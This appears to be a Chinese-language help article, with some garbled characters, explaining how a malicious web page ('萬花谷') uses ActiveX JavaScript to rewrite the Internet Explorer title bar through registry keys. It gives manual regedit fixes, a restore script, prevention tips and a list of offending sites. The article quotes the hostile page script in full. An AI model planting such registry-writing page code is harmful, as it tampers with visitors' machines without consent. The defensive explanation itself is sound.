|
近來(lái),屢屢發(fā)生網(wǎng)友在瀏覽網(wǎng)頁(yè)時(shí)����,由于誤點(diǎn)擊一些網(wǎng)絡(luò)地址�����,造成在IE的瀏覽器的標(biāo)題欄出現(xiàn)一些廣告信息��,很是令人討厭!比如訪(fǎng)問(wèn)已經(jīng)大名鼎鼎的惡意網(wǎng)頁(yè)“萬(wàn)花谷”��,會(huì)將你的IE瀏覽器的標(biāo)題欄顯示“歡迎來(lái)到萬(wàn)花谷!請(qǐng)與OICQ:4040465聯(lián)系!”對(duì)于被惡意修改的IE標(biāo)題欄該怎樣恢復(fù)呢���?
一�����、IE標(biāo)題欄被修改的原因
其實(shí)�����,該惡意網(wǎng)頁(yè)是含有有害代碼的ActiveX網(wǎng)頁(yè)文件,這些廣告信息的出現(xiàn)是因?yàn)闉g覽者的注冊(cè)表被惡意更改的結(jié)果,原因就是利用了下面這段JavaScript代碼修改了HKLM\SOFTWARE\Microsoft\InternetExplorer\Main\和HKCU\Software\Microsoft\Internet Explorer\Main\
中的Window Title的鍵值��?纯聪旅娴拇a你就會(huì)明白了:
<SCRIPT language=JavaScript>
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent> ");
function f(){ try {
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance(); Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance(); FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance(); Net = a1.GetObject(); try
{ if (document.cookie.indexOf("Chg") == -1) {
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", " 歡迎光臨http:/www.520cat.com");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", " .歡迎光臨http:/www.520cat.com");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chgg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{} } function init() {
setTimeout("f()", 1000);
} init();
從上面不難看出它修改了你的注冊(cè)表�����!如果你認(rèn)為沒(méi)有什么了不起��,僅僅是修改了IE標(biāo)題欄而已,那你可大錯(cuò)特錯(cuò)了�!如果他將你注冊(cè)表改動(dòng)將你IE指向一個(gè)木馬軟件的下載地址��,木馬服務(wù)端軟件有只有幾K到幾十K大小的���,下載這樣一個(gè)木馬只需幾秒���!幾乎是一閃而過(guò)���!然后木馬程序再將你的防火墻�、殺毒軟件全部關(guān)閉!接著在注冊(cè)表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run里加入木馬服務(wù)端自啟動(dòng)程序,使之開(kāi)機(jī)自動(dòng)運(yùn)行,這樣做是完全可能的!而結(jié)果是非常嚴(yán)重的���!因此大家要十分小心嘍!
在系統(tǒng)默認(rèn)狀態(tài)下,是由應(yīng)用程序本身來(lái)提供標(biāo)題欄的信息�����,但也允許用戶(hù)自行在上述注冊(cè)表項(xiàng)目中填加信息��,而一些惡意的網(wǎng)站正是利用了這一點(diǎn)來(lái)得逞的:它們將串值Window Title下的鍵值改為其網(wǎng)站名或更多的廣告信息�����,從而達(dá)到改變?yōu)g覽者IE標(biāo)題欄的目的。不過(guò)在Windows 2000下�,在注冊(cè)表
HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\和HKCU\Software\Microsoft\Internet Explorer\Main\
中沒(méi)有Window Title這個(gè)鍵值�����,所以這種惡意網(wǎng)頁(yè)對(duì)W2K是無(wú)法修改其標(biāo)題欄的。
二、解決辦法
方法一:
�。1)在Windows啟動(dòng)后���,點(diǎn)擊“開(kāi)始”->“運(yùn)行”菜單項(xiàng)�����,在“打開(kāi)”欄中鍵入regedit�,然后按“確定”鍵;
����。2)展開(kāi)注冊(cè)表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下����,在右半部分窗口中找到串值“Window Title” ,將該串值刪除即可�����,或?qū)indow Title的鍵值改為“IE瀏覽器”也可以���;
����。3)同理,展開(kāi)注冊(cè)表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main����,然后處理方法同(2)中所述��。
(4)退出注冊(cè)表編輯器,重新啟動(dòng)計(jì)算機(jī),運(yùn)行IE,你會(huì)發(fā)現(xiàn)困擾你的問(wèn)題解決了����!
方法二:復(fù)制如下代碼����,存為文本文件�,再改名為.htm文件,點(diǎn)擊運(yùn)行����,可以自動(dòng)恢復(fù)IE標(biāo)題欄。
<!-- Begin set start page and internet Explorer Window title-->
<SCRIPT language=JavaScript>
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent> ");
function f(){
try
{
<!--ActiveX初始化過(guò)程-->
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookies.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
<!--檢測(cè)用戶(hù)注冊(cè)表并修改相應(yīng)的鍵值為系統(tǒng)默認(rèn)值“Microsoft Internet Explorer”-->
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
<!--實(shí)現(xiàn)打開(kāi)頁(yè)面后1秒鐘內(nèi)執(zhí)行測(cè)試修改注冊(cè)表的工作-->
}
init();
</SCRIPT>
<!--End set start page and internet Explorer Window title-->
三�����、預(yù)防辦法:
1.要避免中招���,關(guān)鍵是不要輕易去一些自己并不了解的站點(diǎn)���,特別是那些看上去美麗誘人的網(wǎng)址更不要貿(mào)然前往�,否則吃虧的往往是你。
2.由于該網(wǎng)頁(yè)是含有有害代碼的ActiveX網(wǎng)頁(yè)文件���,因此在IE設(shè)置中將ActiveX插件和控件、Java腳本等全部禁止就可以避免中招���。具體方法是:在IE窗口中點(diǎn)擊“工具->Internet選項(xiàng),在彈出的對(duì)話(huà)框中選擇“安全”標(biāo)簽���,再點(diǎn)擊“自定義級(jí)別”按鈕,就會(huì)彈出“安全設(shè)置”對(duì)話(huà)框�,把其中所有ActiveX插件和控件以及Java相關(guān)全部選擇“禁用”即可���。在Win2k下把服務(wù)里面的遠(yuǎn)程注冊(cè)表操作服務(wù)“Remote Registry Service”禁用就可以了�。方法是點(diǎn)擊“管理工具->服務(wù)->Remote Registry Service(允許遠(yuǎn)程注冊(cè)表操作)�,將這一項(xiàng)禁用。
3.對(duì)于所有用戶(hù)�����,可以通過(guò)升級(jí)到最新的KVW3000病毒庫(kù)�,來(lái)預(yù)防該類(lèi)惡意網(wǎng)頁(yè)的侵害(注意,必須是6月28日以后的病毒庫(kù)方可)����。
四���、目前已知這類(lèi)網(wǎng)站名稱(chēng)匯總
據(jù)我統(tǒng)計(jì)(所知)有如下網(wǎng)站可以修改瀏覽者的注冊(cè)表,甚至于是限制系統(tǒng)功能,使瀏覽者無(wú)法使用電腦!
1.http://on888.home.chinaren.com 這是大名鼎鼎的惡意網(wǎng)站“萬(wàn)花谷”的網(wǎng)址�����;
2.http://www.findfeel.com/default.htm 這是和“萬(wàn)花谷”同類(lèi)型的惡意網(wǎng)站����,破壞效果相同;
3.http://www.gohip.com 可以改變IE標(biāo)題欄和收藏夾的討厭網(wǎng)站,沒(méi)有更嚴(yán)重的破壞功能��;
4.http://www.520cat.com 修改瀏覽者的IE標(biāo)題欄的網(wǎng)站���。
當(dāng)然,這樣的網(wǎng)站遠(yuǎn)遠(yuǎn)不止文中所提到的這幾個(gè),它們的危害也各不相同�����,但只要你按本文中所說(shuō)的預(yù)防方法去做�,就不會(huì)有事了!
|
溫馨提示:喜歡本站的話(huà)�,請(qǐng)收藏一下本站���!
